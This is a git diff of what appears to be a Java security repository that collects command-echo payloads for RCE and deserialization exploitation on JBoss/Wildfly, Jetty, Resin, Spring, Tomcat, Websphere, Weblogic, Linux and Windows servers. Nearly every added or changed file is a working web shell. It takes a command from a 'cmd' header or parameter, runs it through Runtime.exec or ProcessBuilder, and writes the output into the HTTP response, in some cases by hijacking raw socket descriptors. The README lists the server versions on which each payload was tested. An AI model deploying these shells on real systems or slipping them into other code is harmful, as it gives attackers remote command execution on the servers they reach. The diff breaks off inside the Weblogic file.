diff --git a/JBoss(Wildfly)/README.md b/JBoss(Wildfly)/README.md new file mode 100644 index 0000000..fcba90d --- /dev/null +++ b/JBoss(Wildfly)/README.md @@ -0,0 +1,7 @@ +# JBoss(Wildfly) 回显 + +## 效果 +![img](https://raw.githubusercontent.com/feihong-cs/Java-Rce-Echo/master/JBoss(Wildfly)/img/JBossEcho.png) + +## 参考 +[https://developer.jboss.org/thread/169877](https://developer.jboss.org/thread/169877) diff --git a/JBoss(Wildfly)/code/JBossEcho.jsp b/JBoss(Wildfly)/code/JBossEcho.jsp new file mode 100644 index 0000000..1498b7e --- /dev/null +++ b/JBoss(Wildfly)/code/JBossEcho.jsp @@ -0,0 +1,18 @@ +<%@ page contentType="text/html;charset=UTF-8" language="java" %> +<% + io.undertow.servlet.spec.HttpServletRequestImpl req = (io.undertow.servlet.spec.HttpServletRequestImpl) javax.security.jacc.PolicyContext.getContext("javax.servlet.http.HttpServletRequest"); + String cmd = req.getParameter("cmd"); + if(cmd != null && !cmd.isEmpty()) { + java.io.InputStream in = Runtime.getRuntime().exec(cmd).getInputStream(); + java.io.OutputStream os = req.getExchange().getOutputStream(); + + byte[] bytes = new byte[1024]; + int len = 0; + while ((len = in.read(bytes)) != -1) { + os.write(bytes, 0, len); + } + + os.close(); + in.close(); + } +%> \ No newline at end of file diff --git a/JBoss(Wildfly)/img/JBossEcho.png b/JBoss(Wildfly)/img/JBossEcho.png new file mode 100644 index 0000000..3abf5fe Binary files /dev/null and b/JBoss(Wildfly)/img/JBossEcho.png differ diff --git a/Jetty/code/jetty789Echo.jsp b/Jetty/code/jetty789Echo.jsp index 847e28e..4028bf4 100644 --- a/Jetty/code/jetty789Echo.jsp +++ b/Jetty/code/jetty789Echo.jsp @@ -24,14 +24,17 @@ obj = method.invoke(connection, null); method = obj.getClass().getMethod("getHeader", new Class[]{String.class}); - obj = method.invoke(obj, new Object[]{"cmd"}); + String cmd = (String)method.invoke(obj, new Object[]{"cmd"}); - String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter("\\A").next(); + if(cmd != null && !cmd.isEmpty()){ + String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); - method = connection.getClass().getMethod("getPrintWriter", new Class[]{String.class}); - java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, new Object[]{"utf-8"}); - printWriter.println(res); + method = connection.getClass().getMethod("getPrintWriter", new Class[]{String.class}); + java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, new Object[]{"utf-8"}); + printWriter.println(res); + } + break; }else if(obj != null && obj.getClass().getName().endsWith("HttpConnection")){ java.lang.reflect.Method method = obj.getClass().getDeclaredMethod("getHttpChannel", null); Object httpChannel = method.invoke(obj, null); @@ -40,16 +43,19 @@ obj = method.invoke(httpChannel, null); method = obj.getClass().getMethod("getHeader", new Class[]{String.class}); - obj = method.invoke(obj, new Object[]{"cmd"}); - - String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter("\\A").next(); - - method = httpChannel.getClass().getMethod("getResponse", null); - obj = method.invoke(httpChannel, null); - - method = obj.getClass().getMethod("getWriter", null); - java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj, null); - printWriter.println(res); + String cmd = (String)method.invoke(obj, new Object[]{"cmd"}); + if(cmd != null && !cmd.isEmpty()){ + String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); + + method = httpChannel.getClass().getMethod("getResponse", null); + obj = method.invoke(httpChannel, null); + + method = obj.getClass().getMethod("getWriter", null); + java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj, null); + printWriter.println(res); + } + + break; } } %> \ No newline at end of file diff --git a/Jetty/code/jetty78Echo.jsp b/Jetty/code/jetty78Echo.jsp index 6165920..cda8dbd 100644 --- a/Jetty/code/jetty78Echo.jsp +++ b/Jetty/code/jetty78Echo.jsp @@ -22,13 +22,16 @@ obj = method.invoke(connection); method = obj.getClass().getMethod("getHeader", String.class); - obj = method.invoke(obj, "cmd"); + String cmd = (String)method.invoke(obj, "cmd"); + if(cmd != null && !cmd.isEmpty()){ + String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); - String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter("\\A").next(); + method = connection.getClass().getMethod("getPrintWriter", String.class); + java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, "utf-8"); + printWriter.println(res); + } - method = connection.getClass().getMethod("getPrintWriter", String.class); - java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, "utf-8"); - printWriter.println(res); + break; } } %> \ No newline at end of file diff --git a/Jetty/code/jetty9Echo.jsp b/Jetty/code/jetty9Echo.jsp index 67a0aff..9b5e807 100644 --- a/Jetty/code/jetty9Echo.jsp +++ b/Jetty/code/jetty9Echo.jsp @@ -24,16 +24,19 @@ obj = method.invoke(httpChannel); method = obj.getClass().getMethod("getHeader", String.class); - obj = method.invoke(obj, "cmd"); - - String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter("\\A").next(); - - method = httpChannel.getClass().getMethod("getResponse"); - obj = method.invoke(httpChannel); - - method = obj.getClass().getMethod("getWriter"); - java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj); - printWriter.println(res); + String cmd = (String)method.invoke(obj, "cmd"); + if(cmd != null && !cmd.isEmpty()){ + String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); + + method = httpChannel.getClass().getMethod("getResponse"); + obj = method.invoke(httpChannel); + + method = obj.getClass().getMethod("getWriter"); + java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj); + printWriter.println(res); + } + + break; } } %> \ No newline at end of file diff --git a/Linux/code/case2-Deprecated.jsp b/Linux/code/case2-Deprecated.jsp new file mode 100644 index 0000000..41cd883 --- /dev/null +++ b/Linux/code/case2-Deprecated.jsp @@ -0,0 +1,47 @@ +<%@ page contentType="text/html;charset=UTF-8" language="java" %> +<% + String command = "ls -al /proc/$PPID/fd|grep socket:|awk 'BEGIN{FS=\"[\"}''{print $2}'|sed 's/.$//'"; + String[] cmd = new String[]{"/bin/sh", "-c", command }; + java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream())); + java.util.List res1 = new java.util.ArrayList(); + String line = ""; + while ((line = br.readLine()) != null){ + res1.add(line); + } + br.close(); + + Thread.sleep((long)2000); + + command = "ls -al /proc/$PPID/fd|grep socket:|awk '{print $9, $11}'"; + cmd = new String[]{"/bin/sh", "-c", command }; + br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream())); + java.util.List res2 = new java.util.ArrayList(); + while ((line = br.readLine()) != null){ + res2.add(line); + } + br.close(); + + int index = 0; + int max = 0; + for(int i = 0; i < res1.size(); i++){ + for(int j = 0; j < res2.size(); j++){ + if(((String)res2.get(j)).contains((String)res1.get(i))){ + String socketNo = ((String)res2.get(j)).split("\\s+")[1].substring(8); + socketNo = socketNo.substring(0, socketNo.length() - 1); + if(Integer.parseInt(socketNo) > max) { + max = Integer.parseInt(socketNo); + index = j; + } + } + } + } + + int fd = Integer.parseInt(((String)res2.get(index)).split("\\s")[0]); + java.lang.reflect.Constructor c= java.io.FileDescriptor.class.getDeclaredConstructor(new Class[]{Integer.TYPE}); + c.setAccessible(true); + cmd = new String[]{"/bin/sh", "-c", "echo \"It works!\"" }; + String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); + String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + res.length() + "\n\n" + res + "\n"; + java.io.FileOutputStream os = new java.io.FileOutputStream((java.io.FileDescriptor)c.newInstance(new Object[]{new Integer(fd)})); + os.write(result.getBytes()); +%> \ No newline at end of file diff --git a/Linux/code/case2.jsp b/Linux/code/case2.jsp index 41cd883..d05498f 100644 --- a/Linux/code/case2.jsp +++ b/Linux/code/case2.jsp @@ -1,47 +1,58 @@ <%@ page contentType="text/html;charset=UTF-8" language="java" %> <% - String command = "ls -al /proc/$PPID/fd|grep socket:|awk 'BEGIN{FS=\"[\"}''{print $2}'|sed 's/.$//'"; - String[] cmd = new String[]{"/bin/sh", "-c", command }; - java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream())); - java.util.List res1 = new java.util.ArrayList(); - String line = ""; - while ((line = br.readLine()) != null){ - res1.add(line); - } - br.close(); + if(java.io.File.separator.equals("/")){ + String command = "ls -al /proc/$PPID/fd|grep socket:|awk 'BEGIN{FS=\"[\"}''{print $2}'|sed 's/.$//'"; + String[] cmd = new String[]{"/bin/sh", "-c", command}; + java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream())); + java.util.List res1 = new java.util.ArrayList(); + String line = ""; + while ((line = br.readLine()) != null && !line.trim().isEmpty()){ + res1.add(line); + } + br.close(); - Thread.sleep((long)2000); + try { + Thread.sleep((long)2000); + } catch (InterruptedException e) { + //pass + } - command = "ls -al /proc/$PPID/fd|grep socket:|awk '{print $9, $11}'"; - cmd = new String[]{"/bin/sh", "-c", command }; - br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream())); - java.util.List res2 = new java.util.ArrayList(); - while ((line = br.readLine()) != null){ - res2.add(line); - } - br.close(); + command = "ls -al /proc/$PPID/fd|grep socket:|awk '{print $9, $11}'"; + cmd = new String[]{"/bin/sh", "-c", command}; + br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream())); + java.util.List res2 = new java.util.ArrayList(); + while ((line = br.readLine()) != null && !line.trim().isEmpty()){ + res2.add(line); + } + br.close(); - int index = 0; - int max = 0; - for(int i = 0; i < res1.size(); i++){ - for(int j = 0; j < res2.size(); j++){ - if(((String)res2.get(j)).contains((String)res1.get(i))){ - String socketNo = ((String)res2.get(j)).split("\\s+")[1].substring(8); + int index = 0; + int max = 0; + for(int i = 0; i < res2.size(); i++){ + try{ + String socketNo = ((String)res2.get(i)).split("\\s+")[1].substring(8); socketNo = socketNo.substring(0, socketNo.length() - 1); - if(Integer.parseInt(socketNo) > max) { - max = Integer.parseInt(socketNo); - index = j; + for(int j = 0; j < res1.size(); j++){ + if(!socketNo.equals(res1.get(j))) continue; + + if(Integer.parseInt(socketNo) > max) { + max = Integer.parseInt(socketNo); + index = j; + } + break; } + }catch(Exception e){ + //pass } } - } - int fd = Integer.parseInt(((String)res2.get(index)).split("\\s")[0]); - java.lang.reflect.Constructor c= java.io.FileDescriptor.class.getDeclaredConstructor(new Class[]{Integer.TYPE}); - c.setAccessible(true); - cmd = new String[]{"/bin/sh", "-c", "echo \"It works!\"" }; - String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); - String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + res.length() + "\n\n" + res + "\n"; - java.io.FileOutputStream os = new java.io.FileOutputStream((java.io.FileDescriptor)c.newInstance(new Object[]{new Integer(fd)})); - os.write(result.getBytes()); + int fd = Integer.parseInt(((String)res2.get(index)).split("\\s")[0]); + java.lang.reflect.Constructor c= java.io.FileDescriptor.class.getDeclaredConstructor(new Class[]{Integer.TYPE}); + c.setAccessible(true); + cmd = new String[]{"/bin/sh", "-c", "id"}; + String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); + String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + res.length() + "\n\n" + res + "\n"; + java.io.FileOutputStream os = new java.io.FileOutputStream((java.io.FileDescriptor)c.newInstance(new Object[]{new Integer(fd)})); + os.write(result.getBytes()); + } %> \ No newline at end of file diff --git a/README.md b/README.md index 3505664..6dc3acc 100644 --- a/README.md +++ b/README.md @@ -1,11 +1,13 @@ -# 反序列化回显 +# Java RCE 回显 -### 支持的反序列化回显测试代码 +### 支持的回显测试代码 - [x] Linux通用回显 - [x] Windows通用回显 - [x] Spring回显 -- [x] Tomcat (Tested on 6.0.10/6.0.53/7.0.34/7.0.54/7.0.70/7.0.96/7.0.104/8.0.18/8.0.32/8.0.48/8.5.12/8.5.30/8.5.56/9.0.16/9.0.33, failed on 7.0.10/7.0.22) -- [x] Weblogic +- [x] Tomcat通用回显 (Tested on 6.0.10/6.0.53/7.0.34/7.0.54/7.0.70/7.0.96/7.0.104/8.0.18/8.0.32/8.0.48/8.5.12/8.5.30/8.5.56/9.0.16/9.0.33, failed on 7.0.10/7.0.22) +- [x] Weblogic (Tested on 10.3.6.0, 12.1.3.0.0) +- [x] Websphere (Tested on AppServer V8.5(8.5.5.18), AppServer V9.0(9.0.5.5)) +- [x] JBoss(Wildfly) (Testd on 8.0.0.Final, 18.0.0.Final, 21.0.0.Beta1) - [x] Resin (Tested on pro-4.0.64, pro-4.0.57, pro-4.0.45, pro-4.0.32, failed on pro-3.1.15) - [x] Jetty (Tested on 9.4.30.v20200611, 9.3.28.v20191105, 9.2.29.v20191105, 9.0.7.v20131107, 8.1.21.v20160908, 7.6.21.v20160908, failed on 8.0.3.v20160908, 7.2.1.v20101111) diff --git a/Resin/code/resinEcho.jsp b/Resin/code/resinEcho.jsp index d9a6b19..da00953 100644 --- a/Resin/code/resinEcho.jsp +++ b/Resin/code/resinEcho.jsp @@ -1,6 +1,6 @@ <%@ page contentType="text/html;charset=UTF-8" language="java" %> <% - Class clazz = Thread.currentThread().getClass(); + Class clazz = Thread.currentThread().getClass(); java.lang.reflect.Field field = clazz.getSuperclass().getDeclaredField("threadLocals"); field.setAccessible(true); Object obj = field.get(Thread.currentThread()); @@ -21,14 +21,19 @@ if(obj != null && obj.getClass().getName().equals("com.caucho.server.http.HttpRequest")){ com.caucho.server.http.HttpRequest httpRequest = (com.caucho.server.http.HttpRequest)obj; String cmd = httpRequest.getHeader("cmd"); - String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); - com.caucho.server.http.HttpResponse httpResponse = httpRequest.createResponse(); - httpResponse.setHeader("Content-Length", res.length() + ""); - java.lang.reflect.Method method = httpResponse.getClass().getDeclaredMethod("createResponseStream", null); - method.setAccessible(true); - com.caucho.server.http.HttpResponseStream httpResponseStream = (com.caucho.server.http.HttpResponseStream) method.invoke(httpResponse,null); - httpResponseStream.write(res.getBytes(), 0, res.length()); - httpResponseStream.close(); + + if(cmd != null && !cmd.isEmpty()){ + String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); + com.caucho.server.http.HttpResponse httpResponse = httpRequest.createResponse(); + httpResponse.setHeader("Content-Length", res.length() + ""); + java.lang.reflect.Method method = httpResponse.getClass().getDeclaredMethod("createResponseStream", null); + method.setAccessible(true); + com.caucho.server.http.HttpResponseStream httpResponseStream = (com.caucho.server.http.HttpResponseStream) method.invoke(httpResponse,null); + httpResponseStream.write(res.getBytes(), 0, res.length()); + httpResponseStream.close(); + } + + break; } } %> \ No newline at end of file diff --git a/Spring/README.md b/Spring/README.md index 06fd49e..579a2f0 100644 --- a/Spring/README.md +++ b/Spring/README.md @@ -1,4 +1,4 @@ -# Spring回显 +# Spring 回显 ## 依赖 * Spring-web.jar diff --git a/Spring/code/SpringMVCTestController.java b/Spring/code/SpringMVCTestController.java index 7552318..cd936d0 100644 --- a/Spring/code/SpringMVCTestController.java +++ b/Spring/code/SpringMVCTestController.java @@ -19,8 +19,10 @@ public User Test() throws IOException { javax.servlet.http.HttpServletResponse httpresponse = ((org.springframework.web.context.request.ServletRequestAttributes) requestAttributes).getResponse(); String cmd = httprequest.getHeader("cmd"); - String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); - httpresponse.getWriter().println(res); + if(cmd != null && !cmd.isEmpty()){ + String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); + httpresponse.getWriter().println(res); + } return new User(); } diff --git a/Spring/code/SpringWebFlowTestController.java b/Spring/code/SpringWebFlowTestController.java index c6d73b9..82f13c6 100644 --- a/Spring/code/SpringWebFlowTestController.java +++ b/Spring/code/SpringWebFlowTestController.java @@ -26,8 +26,10 @@ public String test() throws IOException { javax.servlet.http.HttpServletResponse response = (javax.servlet.http.HttpServletResponse) servletExternalContext.getNativeResponse(); String cmd = request.getHeader("cmd"); - String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); - response.getWriter().println(res); + if(cmd != null && !cmd.isEmpty()){ + String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); + response.getWriter().println(res); + } return "test"; } diff --git "a/Tomcat/code/TomcatEchoTypeB-\345\205\250\347\211\210\346\234\254.jsp" "b/Tomcat/code/TomcatEchoTypeB-\345\205\250\347\211\210\346\234\254.jsp" new file mode 100644 index 0000000..35c7ecd --- /dev/null +++ "b/Tomcat/code/TomcatEchoTypeB-\345\205\250\347\211\210\346\234\254.jsp" @@ -0,0 +1,56 @@ +<%@ page contentType="text/html;charset=UTF-8" language="java" %> +<% + +// 参考: +// 《tomcat不出网回显连续剧第六集》 https://xz.aliyun.com/t/7535 + + boolean flag = false; + + javax.management.MBeanServer mbeanServer = org.apache.tomcat.util.modeler.Registry.getRegistry((Object)null, (Object)null).getMBeanServer(); + java.lang.reflect.Field field = Class.forName("com.sun.jmx.mbeanserver.JmxMBeanServer").getDeclaredField("mbsInterceptor"); + field.setAccessible(true); + Object obj = field.get(mbeanServer); + + field = Class.forName("com.sun.jmx.interceptor.DefaultMBeanServerInterceptor").getDeclaredField("repository"); + field.setAccessible(true); + com.sun.jmx.mbeanserver.Repository repository = (com.sun.jmx.mbeanserver.Repository) field.get(obj); + + java.util.Set objectSet = repository.query(new javax.management.ObjectName("Catalina:type=GlobalRequestProcessor,*"), null); + for(com.sun.jmx.mbeanserver.NamedObject namedObject : objectSet){ + javax.management.DynamicMBean dynamicMBean = namedObject.getObject(); + field = Class.forName("org.apache.tomcat.util.modeler.BaseModelMBean").getDeclaredField("resource"); + field.setAccessible(true); + obj = field.get(dynamicMBean); + + field = Class.forName("org.apache.coyote.RequestGroupInfo").getDeclaredField("processors"); + field.setAccessible(true); + java.util.ArrayList procssors = (java.util.ArrayList) field.get(obj); + + field = Class.forName("org.apache.coyote.RequestInfo").getDeclaredField("req"); + field.setAccessible(true); + for(int i = 0; i < procssors.size(); i++){ + org.apache.coyote.Request req = (org.apache.coyote.Request) field.get(procssors.get(i)); + String cmd = req.getHeader("cmd"); + if(cmd != null && !cmd.isEmpty()){ + String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd}; + byte[] result = (new java.util.Scanner((new ProcessBuilder(cmds)).start().getInputStream())).useDelimiter("\\A").next().getBytes(); + + Object resp = req.getClass().getMethod("getResponse", new Class[0]).invoke(req, new Object[0]); + try { + Class cls = Class.forName("org.apache.tomcat.util.buf.ByteChunk"); + obj = cls.newInstance(); + cls.getDeclaredMethod("setBytes", new Class[]{byte[].class, int.class, int.class}).invoke(obj, new Object[]{result, new Integer(0), new Integer(result.length)}); + resp.getClass().getMethod("doWrite", new Class[]{cls}).invoke(resp, new Object[]{obj}); + } catch (NoSuchMethodException var5) { + Class cls = Class.forName("java.nio.ByteBuffer"); + obj = cls.getDeclaredMethod("wrap", new Class[]{byte[].class}).invoke(cls, new Object[]{result}); + resp.getClass().getMethod("doWrite", new Class[]{cls}).invoke(resp, new Object[]{obj}); + } + + flag = true; + } + + if(flag) break; + } + } +%> diff --git a/Websphere/README.md b/Websphere/README.md new file mode 100644 index 0000000..6cfeb58 --- /dev/null +++ b/Websphere/README.md @@ -0,0 +1,5 @@ +# Websphere 回显 + +## 效果 +![img](https://raw.githubusercontent.com/feihong-cs/Java-Rce-Echo/master/Websphere/img/001.png) + diff --git a/Websphere/code/websphereEcho.jsp b/Websphere/code/websphereEcho.jsp new file mode 100644 index 0000000..b507eb7 --- /dev/null +++ b/Websphere/code/websphereEcho.jsp @@ -0,0 +1,28 @@ +<%@ page contentType="text/html;charset=UTF-8" language="java" %> +<% + Class clazz = Thread.currentThread().getClass(); + java.lang.reflect.Field field = clazz.getDeclaredField("wsThreadLocals"); + field.setAccessible(true); + Object obj = field.get(Thread.currentThread()); + + Object[] obj_arr = (Object[]) obj; + for(int i = 0; i < obj_arr.length; i++){ + Object o = obj_arr[i]; + if(o == null) continue; + + if(o.getClass().getName().endsWith("WebContainerRequestState")){ + Object req = o.getClass().getMethod("getCurrentThreadsIExtendedRequest", new Class[0]).invoke(o, new Object[0]); + Object resp = o.getClass().getMethod("getCurrentThreadsIExtendedResponse", new Class[0]).invoke(o, new Object[0]); + + String cmd = (String) req.getClass().getMethod("getHeader", new Class[]{String.class}).invoke(req, new Object[]{"cmd"}); + if(cmd != null && !cmd.isEmpty()){ + String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); + + java.io.PrintWriter printWriter = (java.io.PrintWriter)resp.getClass().getMethod("getWriter", new Class[0]).invoke(resp, new Object[0]); + printWriter.println(res); + } + + break; + } + } +%> diff --git a/Websphere/img/001.png b/Websphere/img/001.png new file mode 100644 index 0000000..e52c345 Binary files /dev/null and b/Websphere/img/001.png differ diff --git a/Windows/code/WindowsEcho-Deprecated.jsp b/Windows/code/WindowsEcho-Deprecated.jsp new file mode 100644 index 0000000..fd60a1e --- /dev/null +++ b/Windows/code/WindowsEcho-Deprecated.jsp @@ -0,0 +1,71 @@ +<%@ page contentType="text/html;charset=UTF-8" language="java" %> +<% + //准备工作&初始化 + java.lang.reflect.Field field = java.io.FileDescriptor.class.getDeclaredField("fd"); + field.setAccessible(true); + + Class clazz1 = Class.forName("sun.nio.ch.Net"); + java.lang.reflect.Method method1 = clazz1.getDeclaredMethod("remoteAddress",java.io.FileDescriptor.class); + method1.setAccessible(true); + + Class clazz2 = Class.forName("java.net.SocketOutputStream", false, null); + java.lang.reflect.Constructor constructor2 = clazz2.getDeclaredConstructors()[0]; + constructor2.setAccessible(true); + + Class clazz3 = Class.forName("java.net.PlainSocketImpl"); + java.lang.reflect.Constructor constructor3 = clazz3.getDeclaredConstructor(new Class[]{java.io.FileDescriptor.class}); + constructor3.setAccessible(true); + + java.lang.reflect.Method write = clazz2.getDeclaredMethod("write",new Class[]{byte[].class}); + write.setAccessible(true); + + java.net.InetSocketAddress remoteAddress = null; + java.util.List list1 = new java.util.ArrayList(); + java.util.List list2 = new java.util.ArrayList(); + java.io.FileDescriptor fileDescriptor = new java.io.FileDescriptor(); + + //第一次尝试 + for(int i = 0; i < 10000; i++){ + field.set(fileDescriptor, i); + + try{ + remoteAddress= (java.net.InetSocketAddress) method1.invoke(null, fileDescriptor); + if(remoteAddress.toString().startsWith("/127.0.0.1")) continue; + list1.add(i); + }catch(Exception e){ + //pass + } + } + + //延迟2s + Thread.sleep(2000); + + //第二次尝试 + for(int i = 0; i < 10000; i++){ + field.set(fileDescriptor, i); + + try{ + remoteAddress = (java.net.InetSocketAddress) method1.invoke(null, fileDescriptor); + if(remoteAddress.toString().startsWith("/127.0.0.1")) continue; + list2.add(i); + }catch(Exception e){ + //pass + } + } + + //取交集 + list1.retainAll(list2); + + for(Integer fdVal : list1){ + try{ + field.set(fileDescriptor, fdVal); + Object socketOutputStream = constructor2.newInstance(new Object[]{constructor3.newInstance(new Object[]{fileDescriptor})}); + + String res = new java.util.Scanner(Runtime.getRuntime().exec("echo \"It works!!\"").getInputStream()).useDelimiter("\\A").next(); + String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + res.length() + "\n\n" + res + "\n"; + write.invoke(socketOutputStream, new Object[]{result.getBytes()}); + }catch (Exception e){ + //pass + } + } +%> \ No newline at end of file diff --git a/Windows/code/WindowsEcho.jsp b/Windows/code/WindowsEcho.jsp index fd60a1e..0108ea5 100644 --- a/Windows/code/WindowsEcho.jsp +++ b/Windows/code/WindowsEcho.jsp @@ -1,71 +1,50 @@ <%@ page contentType="text/html;charset=UTF-8" language="java" %> <% - //准备工作&初始化 - java.lang.reflect.Field field = java.io.FileDescriptor.class.getDeclaredField("fd"); - field.setAccessible(true); - - Class clazz1 = Class.forName("sun.nio.ch.Net"); - java.lang.reflect.Method method1 = clazz1.getDeclaredMethod("remoteAddress",java.io.FileDescriptor.class); - method1.setAccessible(true); - - Class clazz2 = Class.forName("java.net.SocketOutputStream", false, null); - java.lang.reflect.Constructor constructor2 = clazz2.getDeclaredConstructors()[0]; - constructor2.setAccessible(true); - - Class clazz3 = Class.forName("java.net.PlainSocketImpl"); - java.lang.reflect.Constructor constructor3 = clazz3.getDeclaredConstructor(new Class[]{java.io.FileDescriptor.class}); - constructor3.setAccessible(true); - - java.lang.reflect.Method write = clazz2.getDeclaredMethod("write",new Class[]{byte[].class}); - write.setAccessible(true); - - java.net.InetSocketAddress remoteAddress = null; - java.util.List list1 = new java.util.ArrayList(); - java.util.List list2 = new java.util.ArrayList(); - java.io.FileDescriptor fileDescriptor = new java.io.FileDescriptor(); - - //第一次尝试 - for(int i = 0; i < 10000; i++){ - field.set(fileDescriptor, i); - - try{ - remoteAddress= (java.net.InetSocketAddress) method1.invoke(null, fileDescriptor); - if(remoteAddress.toString().startsWith("/127.0.0.1")) continue; - list1.add(i); - }catch(Exception e){ - //pass + if(java.io.File.separator.equals("\\")){ + java.lang.reflect.Field field = java.io.FileDescriptor.class.getDeclaredField("fd"); + field.setAccessible(true); + + Class clazz1 = Class.forName("sun.nio.ch.Net"); + java.lang.reflect.Method method1 = clazz1.getDeclaredMethod("remoteAddress",new Class[]{java.io.FileDescriptor.class}); + method1.setAccessible(true); + + Class clazz2 = Class.forName("java.net.SocketOutputStream", false, null); + java.lang.reflect.Constructor constructor2 = clazz2.getDeclaredConstructors()[0]; + constructor2.setAccessible(true); + + Class clazz3 = Class.forName("java.net.PlainSocketImpl"); + java.lang.reflect.Constructor constructor3 = clazz3.getDeclaredConstructor(new Class[]{java.io.FileDescriptor.class}); + constructor3.setAccessible(true); + + java.lang.reflect.Method write = clazz2.getDeclaredMethod("write",new Class[]{byte[].class}); + write.setAccessible(true); + + java.net.InetSocketAddress remoteAddress = null; + java.util.List list = new java.util.ArrayList(); + java.io.FileDescriptor fileDescriptor = new java.io.FileDescriptor(); + for(int i = 0; i < 50000; i++){ + field.set((Object)fileDescriptor, (Object)(new Integer(i))); + try{ + remoteAddress= (java.net.InetSocketAddress) method1.invoke(null, new Object[]{fileDescriptor}); + if(remoteAddress.toString().startsWith("/127.0.0.1")) continue; + if(remoteAddress.toString().startsWith("/0:0:0:0:0:0:0:1")) continue; + list.add(new Integer(i)); + + }catch(Exception e){} } - } - - //延迟2s - Thread.sleep(2000); - - //第二次尝试 - for(int i = 0; i < 10000; i++){ - field.set(fileDescriptor, i); - - try{ - remoteAddress = (java.net.InetSocketAddress) method1.invoke(null, fileDescriptor); - if(remoteAddress.toString().startsWith("/127.0.0.1")) continue; - list2.add(i); - }catch(Exception e){ - //pass - } - } - - //取交集 - list1.retainAll(list2); - - for(Integer fdVal : list1){ - try{ - field.set(fileDescriptor, fdVal); - Object socketOutputStream = constructor2.newInstance(new Object[]{constructor3.newInstance(new Object[]{fileDescriptor})}); - String res = new java.util.Scanner(Runtime.getRuntime().exec("echo \"It works!!\"").getInputStream()).useDelimiter("\\A").next(); - String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + res.length() + "\n\n" + res + "\n"; - write.invoke(socketOutputStream, new Object[]{result.getBytes()}); - }catch (Exception e){ - //pass + for(int i = list.size() - 1; i >= 0; i--){ + try{ + field.set((Object)fileDescriptor, list.get(i)); + Object socketOutputStream = constructor2.newInstance(new Object[]{constructor3.newInstance(new Object[]{fileDescriptor})}); + String[] cmd = new String[]{"cmd","/C", "whoami"}; + String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next().trim(); + String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + (res.length()) + "\n\n" + res + "\n\n"; + write.invoke(socketOutputStream, new Object[]{result.getBytes()}); + break; + }catch (Exception e){ + //pass + } } } %> \ No newline at end of file diff --git a/weblogic/README.md b/weblogic/README.md index d562358..a2f1097 100644 --- a/weblogic/README.md +++ b/weblogic/README.md @@ -1,4 +1,4 @@ -# Weblogic 反序列化回显 +# Weblogic 回显 ## 说明 代码直接搬运了 ```lufei``` 师傅的代码 diff --git a/weblogic/code/WeblogicEcho.jsp b/weblogic/code/WeblogicEcho.jsp new file mode 100644 index 0000000..aaf3d18 --- /dev/null +++ b/weblogic/code/WeblogicEcho.jsp @@ -0,0 +1,29 @@ +<%@ page contentType="text/html;charset=UTF-8" language="java" %> +<% + weblogic.work.WorkAdapter adapter = ((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork(); + if(adapter.getClass().getName().endsWith("ServletRequestImpl")){ + String cmd = (String) adapter.getClass().getMethod("getHeader", String.class).invoke(adapter, "cmd"); + + if(cmd != null && !cmd.isEmpty()){ + String result = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); + weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) 